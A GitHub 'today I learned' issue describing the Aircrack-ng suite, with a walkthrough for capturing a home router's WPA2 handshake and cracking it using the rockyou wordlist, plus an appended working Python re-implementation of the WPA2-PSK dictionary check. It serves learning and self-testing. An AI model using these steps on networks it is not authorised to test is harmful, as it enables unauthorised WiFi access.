anitsh / til

Today I Learn (til) - Github `Issues` used as daily learning management system for taking notes and storing resource links.
https://anitshrestha.com.np
MIT License

Aircrack-ng #135

Open anitsh opened 4 years ago

anitsh commented 4 years ago

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third party tools
  • Attacking: Replay attacks, de-authentication, fake access points and others via packet injection
  • Testing: Checking WiFi cards and driver capabilities (capture and injection)
  • Cracking: WEP and WPA PSK (WPA 1 and 2)

All tools are command line which allows for heavy scripting:

  • Airmon-ng is used to manage wireless card modes and to kill unnecessary processes while using aircrack-ng. To sniff a wireless connection, you need to change your wireless card from managed mode to monitor mode and airmon-ng is used for that purpose.
  • Airodump-ng is a wireless sniffer that can capture wireless data from one or more wireless Access Points. It is used to analyze nearby Access Points (AP) and to capture handshakes.
  • Aireplay-ng is used for replay attacks and as packet injector. It can be used to de-authenticate users from their AP to capture handshakes.
  • Airdecap-ng is used to decrypt encrypted WEP, WPA/WPA2 wireless packets with known key.
  • Aircrack-ng is used to attack WPA/WEP wireless protocols in order to find the key.

Resources:

anitsh commented 4 years ago

Penetration testing home router with aircrack-ng

Objectives: Access home router wifi password

Conclusion: From the usage of the tool, what it simply does is compare the passwords in the list to identify the password.

Steps:

  1. Install Kali Linux on Docker.
  2. Install aircrack-ng and pciutils: `apt-get install -y aircrack-ng pciutils`
  3. Save the container's state in a new image.
  4. Run the new container image: `docker run -it --net="host" --privileged --name aircrack kali-aircrack bash`
  5. Get the name of the wifi device: `iwconfig`
  6. Start airmon-ng to monitor the wifi: `airmon-ng start wlp9s0` (the wifi device name `wlp9s0` may vary; the Internet will not work now; the device will now be named something like `wlp9s0mon`).
  7. List out the wifi devices in the area: `airodump-ng wlp9s0mon`. Let it list out the devices, then exit. Select the device's MAC address (BSSID) and CH for the penetration test.
  8. Capture the exchanged 802.11 frames of that device using its BSSID and CH, dumping to a file for easy reading: `airodump-ng --bssid 88:B3:62:24:2D:69 -c 4 --write /tmp/handshake wlp9s0mon` (airodump-ng treats `--write` as a prefix and creates `/tmp/handshake-01.cap`).
  9. There is a default password list provided by Kali. Unarchive the passwords file: `gunzip /usr/share/wordlists/rockyou.txt.gz`, which produces `/usr/share/wordlists/rockyou.txt`.
  10. Crack the password from the device's captured data: `aircrack-ng -a2 -b 88:B3:62:24:2D:69 -w /usr/share/wordlists/rockyou.txt /tmp/handshake-01.cap`. Here `-a2` is the ENC (encryption) type for WPA2; `-a` for WPA.

If there is a password match it will provide the password.
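What the final cracking step actually compares, as an added example: a pure-Python re-implementation of the per-candidate check that a WPA2-PSK dictionary attack performs (derive the PMK from passphrase and ESSID with PBKDF2, expand it to the PTK, recompute the EAPOL-Key MIC with the KCK and compare against the captured MIC). This is not aircrack-ng's code and not from the notes above; the ESSID, client MAC, nonces, passphrase, wordlist and EAPOL frame are constructed for the demonstration (only the BSSID is taken from the capture command above), and the frame layout covers WPA2/CCMP (key descriptor version 2, HMAC-SHA1 MIC) only.

```python
import hashlib
import hmac

# Added example: re-implements the check aircrack-ng performs for every
# candidate passphrase in a WPA2-PSK dictionary attack. Not aircrack-ng code;
# every handshake value below is constructed for the demonstration.

MIC_OFFSET = 81  # EAPOL hdr(4) + desc type(1) + key info(2) + key len(2)
                 # + replay counter(8) + nonce(32) + IV(16) + RSC(8) + ID(8)


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """802.11i PSK/PMK: PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1 blocks with a trailing counter byte, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(essid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """Return the first passphrase whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, essid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]  # KCK = first 128 bits
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) carrying the given SNonce and MIC."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + b"\x00\x10"                # key length 16
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic + b"\x00\x00")         # MIC, key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


# Constructed handshake: BSSID from the capture command above, everything else made up.
ESSID = "HomeWiFi"
AP_MAC = bytes.fromhex("88b362242d69")
STA_MAC = bytes.fromhex("0a1b2c3d4e5f")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "sunshine1"
WORDLIST = ["123456", "password", "sunshine1", "qwerty123"]


def captured_msg2() -> bytes:
    """Simulate the captured message 2: the real client computes the MIC with the true key."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, ESSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


def demo(wordlist=WORDLIST):
    """Run the dictionary attack against the constructed capture."""
    return crack(ESSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured_msg2(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The cost of the attack is the 4096-round PBKDF2 per candidate, which is why the ESSID (the salt) matters and why a rockyou-sized list takes minutes rather than seconds; the MIC comparison itself is cheap. Parsing the real `-01.cap` file to pull out the BSSID, client MAC, nonces and message 2 is left to the capture tooling, as it is above.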

anitsh commented 4 years ago

Further research could be done with:

and find other methods and tools.